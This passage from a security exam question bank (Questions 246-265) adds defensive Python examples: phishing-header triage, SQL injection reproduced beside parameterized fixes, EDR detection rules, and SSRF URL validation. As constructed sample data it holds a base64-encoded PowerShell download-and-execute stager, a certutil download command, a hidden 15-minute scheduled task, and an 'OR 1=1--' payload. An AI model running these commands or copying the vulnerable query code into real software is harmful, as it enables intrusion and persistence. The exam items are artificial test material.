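# Assumed: display names we expect to see, and the domain each should send from.
KNOWN_VENDORS: Dict[str, str] = {"Acme Supplies": "acmesupplies.example"}
# Assumed list of free webmail domains ("webmail.example" stands in for one).
FREE_WEBMAIL: Set[str] = {"gmail.com", "outlook.com", "yahoo.com", "webmail.example"}

SUSPECT = """\
From: Acme Supplies <acme.billing@webmail.example>
Reply-To: invoices@acmesuplies.example
Return-Path: <acme.billing@webmail.example>
Subject: Overdue invoice - review within 10 minutes

Please open the attached invoice immediately to avoid suspension.
"""

CLEAN = """\
From: Acme Supplies <billing@acmesupplies.example>
Return-Path: <billing@acmesupplies.example>
Subject: Invoice 4471 for April

Attached is the invoice for last month's order.
"""


def _domain(header_value: str) -> str:
    addr = parseaddr(header_value)[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: one dropped, added or substituted letter is 1,
    a transposition is 2, hence the threshold of 2 below."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(raw: str, vendors=KNOWN_VENDORS, webmail=FREE_WEBMAIL) -> List[Tuple]:
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    from_dom = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    reply_dom = _domain(msg.get("Reply-To", ""))
    env_dom = _domain(msg.get("Return-Path", ""))   # envelope sender
    findings: List[Tuple] = []

    expected = vendors.get(name)
    if expected and from_dom != expected:
        findings.append(("display_name_mismatch", name, from_dom))
    for label, dom in (("From", from_dom), ("Return-Path", env_dom)):
        if dom in webmail:
            findings.append(("free_webmail", label, dom))
    if reply_dom and reply_dom != from_dom:
        findings.append(("replyto_mismatch", from_dom, reply_dom))
    for dom in {from_dom, reply_dom} - {""}:
        for good in vendors.values():
            if dom != good and edit_distance(dom, good) <= 2:
                findings.append(("lookalike", dom, good))
    text = (msg.get("Subject", "") + " " + msg.get_payload()).lower()
    if re.search(r"\b(immediately|within \d+ minutes|today|suspen)", text):
        findings.append(("urgency", "time pressure in subject or body"))
    return findings
```

The logo and the attachment in Question 230's message produce no finding here on purpose: both are trivially copied from a real supplier, which is why the questions treat them as weak indicators next to the sender and Reply-To domains.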

Question 246 (hard, multi select)

A user receives an SMS from 'IT Service Desk' saying their MFA enrollment expires today and includes a shortened link. Five minutes later, the user gets a phone call from the same number asking them to read back the code shown in the authenticator app so the ticket can be closed. Which two attack channels are used in this campaign? Select two.

Question 247 (medium, multiple choice)

A public web server becomes unreachable during an outage. NetFlow shows a large volume of DNS responses arriving from many open resolvers, although the server never sent the corresponding queries; the attacker sent small DNS queries to those resolvers with the victim server's address spoofed as the source. What type of attack is this?

Question 248 (medium, multiple choice)

A SOC analyst sees many login attempts against one SaaS account from hundreds of IPs over 20 minutes. Most passwords are valid-looking, but only a few result in successful logons, and the successful attempts use a password pattern that was exposed in a public breach list. What is the best mitigation to reduce this attack?

Question 249 (easy, multi select)

A developer wants to reduce the risk of SQL injection in a new customer search form. Which two changes are the best mitigations? Select two.

Question 250 (medium, multiple choice)

A finance team receives emails that appear to come from the CEO's assistant and ask them to review a document. Several users entered their passwords on a fake login page, and the attackers then signed in from a new country using the same credentials. Which control most directly reduces successful account takeover if a password is stolen?

Question 251 (medium, multiple choice)

A developer reports that a search field returns all customer records when they enter a single quote followed by OR 1=1. Security confirms the web app concatenates user input directly into SQL statements. Which remediation is best?
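
The injections from Questions 242 and 251 reproduced against an in-memory SQLite table, beside the parameterized form that Questions 249 and 251 ask for, as an added example that is not part of the question bank. The table, rows and function names are constructed for the example.

```python
# Added example (not from the question bank): the injection in the API log
# above reproduced against an in-memory SQLite table, beside the parameterized
# and type-checked form. Table and rows are constructed for the example.
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (order_id INTEGER PRIMARY KEY, customer TEXT, total REAL)")
    conn.executemany(
        "INSERT INTO orders VALUES (?, ?, ?)",
        [(105, "alice", 19.99), (106, "bob", 250.00), (107, "carol", 7.50)],
    )
    return conn


# --- vulnerable: user input concatenated into the statement text ------------

def get_order_vulnerable(conn, order_id_param: str) -> List[Tuple]:
    sql = f"SELECT order_id, customer FROM orders WHERE order_id = {order_id_param}"
    return conn.execute(sql).fetchall()


def search_vulnerable(conn, name: str) -> List[Tuple]:
    sql = f"SELECT order_id, customer FROM orders WHERE customer = '{name}'"
    return conn.execute(sql).fetchall()


# --- fixed: bind parameters, and validate the type where one is known -------

def get_order_fixed(conn, order_id_param: str) -> List[Tuple]:
    try:
        order_id = int(order_id_param)   # "105 OR 1=1--" is rejected here
    except ValueError:
        raise ValueError("orderId must be an integer") from None
    return conn.execute(
        "SELECT order_id, customer FROM orders WHERE order_id = ?", (order_id,)
    ).fetchall()


def search_fixed(conn, name: str) -> List[Tuple]:
    # The driver sends the value separately from the statement text, so the
    # quote and the OR never become SQL syntax; no escaping logic is needed.
    return conn.execute(
        "SELECT order_id, customer FROM orders WHERE customer = ?", (name,)
    ).fetchall()


def payload_from_query_string(encoded: str) -> str:
    """What the handler actually receives: the framework URL-decodes %20 etc."""
    return unquote(encoded)
```

The `--` at the end of the payload turns the rest of the original statement into a comment, which is why the log shows a complete result set rather than a syntax error; input validation (the integer cast) and parameter binding each block it independently, and the remediation the questions want is to apply both.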

Question 252 (medium, multiple choice)

A vulnerability scan reports that a Windows file share has SMB signing disabled and anonymous read access is permitted to one directory containing payroll exports. No exploitation has been observed yet. Which action best reduces exposure with minimal business impact?

Question 253 (medium, multiple choice)

A file server suddenly shows many encrypted files with a new extension, and endpoint tools report that Volume Shadow Copy Service was disabled minutes earlier. A note on the desktop demands payment in cryptocurrency. What should the security team do first?

Question 254 (medium, multiple choice)

An internal file server has an administrative web console exposed on the same network as all user laptops. A scan shows that any authenticated employee can reach the console, and several failed login attempts are coming from a workstation that should never manage servers. What is the best hardening action?

Question 255 (medium, multiple choice)

An EDR alert shows a Windows workstation used certutil.exe to download an encoded script, then created a scheduled task named UpdateCheck that runs every 15 minutes. The machine is also making short HTTPS connections to the same external IP. What is the best description of what the attacker is doing?
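
Process-creation rules for the four EDR scenarios in Questions 232, 234, 240 and 255 (Office or mshta spawning PowerShell, an `-enc` payload decoded, certutil used as a downloader, a short-interval scheduled task), as an added example that is not part of the question bank. The events, paths and command lines are constructed; the encoded command is generated inside the block so the decode step can be shown working.

```python
# Added example (not from the question bank): process-creation rules for the
# EDR scenarios above, run over constructed events. Process names and command
# lines are made up; the encoded command is generated below.
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


OFFICE_AND_LOLBIN_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _name(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-enc takes base64 of the UTF-16LE script; PowerShell accepts any
    unambiguous prefix of -EncodedCommand, so -e, -ec and -enc all match."""
    m = re.search(r"(?i)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    alerts = []
    for ev in events:
        parent, image, cl = _name(ev.parent_image), _name(ev.image), ev.command_line
        low = cl.lower()
        if parent in OFFICE_AND_LOLBIN_PARENTS and image in SCRIPT_HOSTS:
            alerts.append((ev.host, "office_or_lolbin_spawns_script_host", f"{parent} -> {image}"))
        if image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cl)
            if decoded:
                alerts.append((ev.host, "encoded_powershell", decoded))
            if "-w hidden" in low or "-nop" in low:
                alerts.append((ev.host, "hidden_noprofile_powershell", cl))
        if image == "certutil.exe" and "-urlcache" in low and "http" in low:
            alerts.append((ev.host, "certutil_download", cl))
        if image == "schtasks.exe" and "/create" in low:
            m = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", low)
            if m and int(m.group(1)) <= 30:
                alerts.append((ev.host, "scheduled_task_short_interval", f"every {m.group(1)} min"))
    return alerts


# Constructed sample: the Word -> PowerShell chain, certutil staging and a
# 15-minute scheduled task on WS01, plus one benign admin script on WS02.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.7/a')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()

EVENTS = [
    ProcEvent("WS01", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {ENC}"),
    ProcEvent("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f https://203.0.113.7/u.txt C:\\Users\\Public\\u.txt"),
    ProcEvent("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              '/create /tn UpdateCheck /sc minute /mo 15 /tr "powershell -w hidden -File C:\\Users\\Public\\u.ps1"'),
    ProcEvent("WS02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]
```

None of these rules needs a file hash, which is the point of the "fileless" questions: the evidence is the parent-child relationship, the decoded script and the persistence artifact (WMI subscription, run key or scheduled task), so the triage step is to decode the command line and pull the persistence entry before anything is remediated.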

Question 256 (easy, multi select)

An employee reports a suspicious email that appears to be from the help desk. Which two details are the strongest signs of phishing? Select two.

Question 257 (medium, multiple choice)

A cloud-hosted API lets users supply a URL for the service to fetch an image. Shortly after release, logs show requests to 169.254.169.254 and internal admin addresses. What control best reduces this risk?
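
The check a fetch-by-URL endpoint should run before issuing the request, as an added example that is not part of the question bank. The resolver is injected so the block runs offline, and the hostname-to-address table is constructed; the address 93.184.216.34 is used only as an example of a globally routable IP.

```python
# Added example (not from the question bank): the URL validation a fetch-by-URL
# endpoint should apply before issuing the request. The resolver is injected so
# the example runs offline; the hostname-to-address table is constructed.
import ipaddress
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_global_address(ip_str: str) -> bool:
    """Reject loopback, link-local (which includes 169.254.169.254), RFC 1918
    and other special-purpose ranges; unwrap IPv4-mapped IPv6 first so
    ::ffff:10.0.0.5 is judged as 10.0.0.5."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def validate_fetch_url(url: str, resolve: Callable[[str], List[str]]) -> Tuple[bool, str]:
    """Return (ok, detail). On success detail is the single IP the caller must
    connect to (sending the hostname in the Host header), so a DNS answer
    cannot change between this check and the connection (rebinding)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        ipaddress.ip_address(host)
        addresses = [host]                 # literal address, nothing to resolve
    except ValueError:
        addresses = resolve(host) or []
    if not addresses:
        return False, f"{host} did not resolve"
    for addr in addresses:                 # every answer must be global
        if not is_global_address(addr):
            return False, f"{host} maps to non-global address {addr}"
    return True, addresses[0]


# Constructed resolver table standing in for DNS.
FAKE_DNS = {
    "images.example": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],
}


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])
```

Validating the URL string alone is not enough: a hostname that resolves to the metadata address passes a string filter, so the check has to run on the resolved addresses and the connection has to be pinned to the address that was checked. Requiring IMDSv2 (session tokens) on the instance, or blocking the metadata address from the application's network namespace, closes the same gap from the other side.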

Question 258 (medium, multi select)

A security analyst is investigating a potential data exfiltration incident. Which three of the following indicators are most commonly associated with a data exfiltration attack? (Choose three.)

Question 259 (medium, multi select)

An organization is implementing security controls to mitigate the risk of social engineering attacks. Which three of the following are effective mitigations? (Choose three.)

Question 260 (medium, multi select)

A security team is reviewing vulnerabilities in a web application. Which three of the following are common web application vulnerabilities that should be addressed? (Choose three.)

Question 261 (medium, multi select)

An organization wants to reduce the risk of malware infections from removable media. Which three of the following controls should be implemented? (Choose three.)

Question 262 (medium, multi select)

Which four of the following are common indicators of a phishing attack? (Choose four.)

Question 263 (medium, multi select)

Which four of the following are effective mitigations against SQL injection attacks? (Choose four.)

Question 264 (medium, drag order)

Drag and drop the steps for the SSH key exchange process in the correct order.

Question 265 (medium, drag order)

Drag and drop the steps to configure a VPN tunnel using IPsec in tunnel mode into the correct order.

